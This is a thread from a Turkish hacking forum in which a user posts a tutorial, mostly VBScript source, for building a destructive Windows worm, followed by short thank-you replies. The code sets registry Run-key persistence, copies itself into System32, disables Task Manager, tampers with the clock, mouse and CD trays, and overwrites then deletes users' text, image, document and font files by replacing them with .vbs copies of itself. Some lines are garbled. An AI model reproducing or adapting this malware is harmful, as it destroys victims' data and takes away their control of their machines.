İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Solucan (Worm) Virüsü Yapımı - DETAYLI ( :

14-07-2016 16:49
#1
Ruh - ait Kullanıcı Resmi (Avatar)
Ruh
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
09/2015
Nereden:
Kudüs
Mesajlar:
6.450
Teşekkür (Etti):
1210
Teşekkür (Aldı):
3088
Konular:
440
Ticaret:
(0) %



Yazılanları Test Etmeniz Önerilmez!

Bundan beni ve THT'yi sorumlu tutamazsınız.


Solucan (worm) Virüsü Yapımı




Evet Arkadaşlar Bu Konuda Bir Virüsün Yapısını Virüs Yazarak İnceleyeceğiz ( :

Belki Bu Birilerin Canını Fena Halde Yakabilir Ama Bir Virüsü Anlamak İleride Başınıza Gelebilecek Muhtemel Olaylarda Çözümde Olabilir Ve İçindeki Bir Çok İpucu İşinizide Görebilir.

Virüsü Programlayacağımız Dil VBS (VISUAL BASIC SCRIPT)

Şimdi bir nevi worm (solucan) yazıcaz.

Okuduktan sonra neden Worm denildiğini çok iyi anlarsınız umarım

Worm’u Yazarken NT sistemleri Hedef alıyoruz.

Tam bir baş belası .txt, jpg, doc, ttf, bmp gibi uzantılarına sahip dosyalara kendini yazıyor.

Size makaleyi okurken nereleri test edebileceğinize belirticem. Aksi takdirde bazı yerler sizinde başınızın belası olabilir...

Solucanımız 3 Aşamadan Meydana Gelecek;


1-
Bulaşma


2- Fırtına Öncesi Sessizlik (Kuluçka)


3- Çoğalma ve Yok etme

1- Virüsler Bir Bilgisayara Bir Çok Yoldan Bulaşabilir Disketlerden, web sayfalarından, e-mailden, dosyadan vb... Worm Tipi Virüsler Genelde e-mail yoluyla bulaşır. Bullaşma Konusunu Sakıncalı olduğu için Bulaşma konusunu anlatmayacağım. Fakat Wormların Nasıl e-maillere ulaştıklarını merak edenler için sanırım aşağıdaki satır açıklayıcı olur;


Set Outlook = CreateObject("Outlook.Application")


2- Kuluçka Virüsün(Worm un) aktifleşmeyi beklediği zaman sürecidir. Bu virüsün yapısına göre değişebilir.


3- Çoğalma ve Yok etme Worm un aktif olduğu zaman ne halt karıştıracağıdır bu da virüsün yapısına göre değişir ( :


Eğer Hazırsanız Şimdi Kodlara Geçelim ( :



İŞTE SİZE YETECEK KODLAR


Dim RegVeYol,Yol,Sys,Ben,str,App

Set RegVeYol = CreateObject( "Wscript.Shell" )
set Shell = WScript.CreateObject( "WScript.Shell" )



Virus Dosya İşlemleri Ve Bir Çok İşlem İçin Scripting.FileSystemObject ve WScript.Shell Nesnesini Kullanıyor

Set Yapici =CreateObject( "Scripting.FileSystemObject" )
Set Ben = Yapici.GetFile( WScript.ScriptFullName)

Sadece CdRom Kapağını Açmak İçin WMPlayer.OCX.7 kulanıyor
Set CdRom = CreateObject( "WMPlayer.OCX.7" )

’WScript.Network Nesnesi Belki Birçok Olay İçin Kullanıla Bilir ama Virüs Sadece Kullanıcı Adını Bulmak İçin Kullanıyor.

Set KurbanPc = WScript.CreateObject( "WScript.Network" )
KurbanName= KurbanPc.UserName

Virüs İlk Çalıştığında Registry Da Olup Olmadığını Kontrol Ediyor

on error resume next
str= RegVeYol.RegRead ("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCur ren tVersionRun")


Üsteki Satırda Registry Den Okuyor

Aşağıdaki kontrol bloğu ise kendisi Registry ye yazılmış ise Virüs aktif hale geçiyor aksi durumda.

Ki genelde ilk çalışdığında öyle olacak...

Kendini Windows her başladığında çalışmak üzere Registry yazar ve kendisini WindowsSystem32 dizinine Windows.VBS adında kopyalar

if str<>Yapici.GetSpecialFolder(1)&"Windows.vbs"Then
Ben.Copy (Yapici.GetSpecialFolder(1)&"Windows.vbs")
RegVeYol.RegWrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCur rent VersionRun",Yapici.GetSpecialFolder(1)&"Windows.vb s"
end if


Artık Worm Windows Tekrar ilk başladığında Aktif hale gelecek


’Worm aktifleştiğinde yapacağı ilk iş Saat i ve Tarihi bozmaktır
’Windows Saat ve Tarih Ayarlarını açar ve SendKeys metodunu kullanarak saat ve tarihi değiştirir.

Saati :00:00 ve tarihide 01 çalıştığı gün 2099 ayarlar

Böylece sistem saatine bağlı çalışan uygulamada çalınmaz duruma gelecektir.

Aşağıdaki satırlar bu işi yapar

shell.Run "RUNDLL32 SHELL32.DLL,Control_RunDLL TIMEDATE.CPL,@0,",0
shell.AppActivate "TIMEDATE"
WScript.Sleep 100
Shell.SendKeys "{PGUP}"&"{TAB}"&"{BS}"&"{TAB}"&"{TAB}"&"0"&"{ TAB} "&"0"&"{TAB}"&"0"&"{TAB}"&"~"

Registry ile görev yöneticisi pasif yapıyor.

RegVeYol.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurr entV ersionPoliciesSystemDisableTaskMgr", "1"


’User32den SwapMouseButton fonksiyonunu çağırıyor ve Mouse’un Sağ Buttonu İle Sol Buttonu değiştiriyor

Shell.Run ("RUNDLL32 USER32.DLL,SwapMouseButton")


Aşağıdaki Satır İse Windows dizindeki bir Wav dosyasını çalıştırır ben bulaştım sana diyor

Komutun sonundaki “0” parametresi ise Media Player'ı gizler

Shell.Run "ALSNDMGR.wav",0

Virüs ben bulaştım sana demeye devam ediyor ve yine SendKeys metodunu kullanarak klavye ışıkları ile oynuyor Kara şimşek Yapıyor.

Sleep Ler Bir Komutdan Diğerine Bekleme Süresini Veriyor

for a=0 to 100
WScript.Sleep 40
Shell.SendKeys "{NUMLOCK}"
WScript.Sleep 100
Shell.SendKeys "{CAPSLOCK}"
WScript.Sleep 100
Shell.SendKeys "{SCROLLLOCK}"
next


Bu da yetmiyor not defterini acıp mesajlar veriyor

Shell.Run "notepad"
WScript.Sleep 40
shell.AppActivate "NOTEPAD"
WScript.sleep 250
for a=0 to 100
WScript.Sleep 100
Shell.SendKeys KurbanName & " Beni Anlamak İstiyor Musun?


’“~” Karakteri Enter tuşu görevi yapıyor

Shell.SendKeys "~"
Shell.SendKeys "Ölüler Konuşuyor Duymuyor Musun?"
Shell.SendKeys "~"&"~"
next


Bir web adresini aç ıyor

shell.Run ("rundll32.exe url.dll,FileProtocolHandler http://www.PcChoLik.WormMaker")

Cdrom Kapaklarını Acıyor

on error resume next
CdRom.cdromCollection.Item(0).eject
CdRom.cdromCollection.Item(1).eject


İyi bir Windows Bilgisine Sahip İseniz Buraya Kadar Yazılanları Bilgisayarınızda Test Edebilirsiniz Ve Worm un Bilgisayarınızda Yaptığı Değişiklilikleri Düzeltiniz .

Buradan Sonra Yazılanları Test Etmeniz Önerilmez!

Bundan beni ve THT'yi sorumlu tutamazsınız.


Aşağıdaki Satırlar Bir Worm’u Solucan Yapan Satırların ta kendisi.

Yani Çoğalma Ve Yok Etme Kullanıcı Worm ‘un Yaptığı İşler İle Uğrasa dursun

Bakın Worm Neler Yapıyor.

Önce Dizin Adındaki 7 indisli dizi değişkenine 7 Adet Klasör Atıyor
Dizi yi For döngüsüne bağlayıp dizinlerdeki belirtilen dosya uzantılarındaki dosyaları buluyor.

Önce Bulduğu Dosyanın İçeriğine Kendini Yazıyor ve dosya_adı.uzantısı.vbs olarak bir kopyasını oluşturduktan sonra eski dosyayı siliyor.

Dim Dosya,, DosyalariBul, Dosyalar, Bul,Dizin(7)
Dizin(0)=Yapici.GetSpecialFolder(0)
Dizin(1)=Yapici.GetSpecialFolder(1)
Dizin(2)=Yapici.GetSpecialFolder(2)
Dizin(3)=RegVeYol.SpecialFolders("My********s")
Dizin(4)=RegVeYol.SpecialFolders("Desktop")
Dizin(5)=RegVeYol.SpecialFolders("Fonts")
Dizin(6)=RegVeYol.SpecialFolders("Favorites")
Dizin(7)=RegVeYol.RegRead("HKEY_CURRENT_USERSoftwa reMicrosoftInternet ExplorerDownload Directory")
for i=0 to 7



Kendisini Acıyor

Set Dosya = Yapici.OpenTextFile(WScript.ScriptFullName,1)

’for Dönsünde Her bir dönüşte Bir Sonraki Dizine Geçiyor

Set DosyalariBul = Yapici.GetFolder(Dizin(i))




Dizin İçindeki Dosyaları Alıyor

Set Dosyalar = DosyalariBul.Files


Yaz Değişkenine Kendi İçeriğini Veriyor.

Yaz = Dosya.ReadAll


Bulunan Dosya Sayısı Kadar Döngüye Giriyor Ve Dosyalar Bulunuyor.

For each file1 in Dosyalar
uzantilar = Yapici.GetExtensionName(file1.path)
uzantilar = lcase(uzanti)


Belirtilen Türde Dosya Buldu ise İçeriğine Kendini Yazıyor Siz Burda Dosya Türünü Değiştirip Deneye Bilirsiniz. Ama Ben Sorumlu Değişim

If (uzantilar = "txt") or (uzantilar = "jpg")or(uzantilar = "bmp")or (uzantilar = "ttf")or (uzantilar = "doc") Then
Set Bul = Yapici.OpenTextFile(file1.path, 2, True)
Bul.Write Yaz
Bul.Close


Sonra İçene Yazdığı Dosyayı Dosya_adı.Uzantısı.vbs Olarak Kopyalıyor ve Eski Dosyayı Siliyor.

set Kopya=Yapici.GetFile(file1.path)
Kopya.copy(file1.path&".vbs")
Yapici.DeleteFile(file1.path)
End If
next
next


Okuduğunuz için teşekkür ederim.

İyi forumlar ( :


Konu Ruh tarafından (14-07-2016 17:00 Saat 17:00 ) değiştirilmiştir.

14-07-2016 16:57
#2
LCF - ait Kullanıcı Resmi (Avatar)
LCF
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
02/2016
Nereden:
Databsabe
Yaş:
17
Mesajlar:
637
Teşekkür (Etti):
152
Teşekkür (Aldı):
54
Konular:
54
Ticaret:
(0) %
Çok Güzel Bir Konu Hocam.
14-07-2016 17:14
#3
Zaphkiel - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2015
Mesajlar:
1.349
Teşekkür (Etti):
370
Teşekkür (Aldı):
186
Konular:
83
Ticaret:
(0) %
Hazır bir örnek ekleyebilir misiniz zahmet olmazsa
14-07-2016 17:17
#4
Alphapack - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
Bursa
Mesajlar:
645
Teşekkür (Etti):
59
Teşekkür (Aldı):
84
Konular:
42
Ticaret:
(0) %
Elinize sağlık güzel bir anlatım
Kullanıcı İmzası
YA HADDİNİZİ BİLECEKSİNİZ. YA DA HADDİNİZİ BİLDİRECEĞİZ

TÜRK HACK TEAM
14-07-2016 17:21
#5
Volkan FG - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2015
Nereden:
©Volkan͐
Mesajlar:
1.077
Teşekkür (Etti):
552
Teşekkür (Aldı):
236
Konular:
46
Ticaret:
(0) %
Çok Teşekkür Ederim Abim İyice Çalışıcam.
Kullanıcı İmzası
SİZİ SİZDEN DAHA İYİ TANIYORUZ
Volkan FG
PENTESTER
| TurkishCyberRaiders |-| OYUN GELİŞTİRME KULÜBÜ |
08-08-2016 00:00
#6
Üyelik tarihi:
04/2016
Nereden:
TÜRKİYE
Mesajlar:
244
Teşekkür (Etti):
95
Teşekkür (Aldı):
28
Konular:
12
Ticaret:
(0) %
teşekkürler
10-08-2016 21:57
#7
Sd1eewDEWG156d - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
04/2013
Mesajlar:
2.419
Teşekkür (Etti):
7
Teşekkür (Aldı):
341
Konular:
56
Ticaret:
(0) %
Örnek yada kaynak kodlu bir örnek yok mu Bu şekilde ben dahil birçok arkadaşımın anlamadığını düşünüyorum. Ama genede ellerine sağlık.
10-08-2016 22:13
#8
Systems 32 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2016
Nereden:
Snne
Mesajlar:
199
Teşekkür (Etti):
20
Teşekkür (Aldı):
9
Konular:
10
Ticaret:
(0) %
Eline saglik
11-08-2016 10:15
#9
Üyelik tarihi:
06/2016
Mesajlar:
37
Teşekkür (Etti):
31
Teşekkür (Aldı):
7
Konular:
2
Ticaret:
(0) %
Uzun zamandır aradıgım konu Teşekkür ederim
11-08-2016 10:55
#10
p20yavuz02 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2016
Nereden:
Bileyim ?
Mesajlar:
1.816
Teşekkür (Etti):
36
Teşekkür (Aldı):
181
Konular:
71
Ticaret:
(0) %
Eline sağlık
Kullanıcı İmzası
Cesaret insanı zafere , kararsızlık tehlikeye , korkaklık ise ölüme götürür.
Yavuz Sultan Selim
Türk Hack Team

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı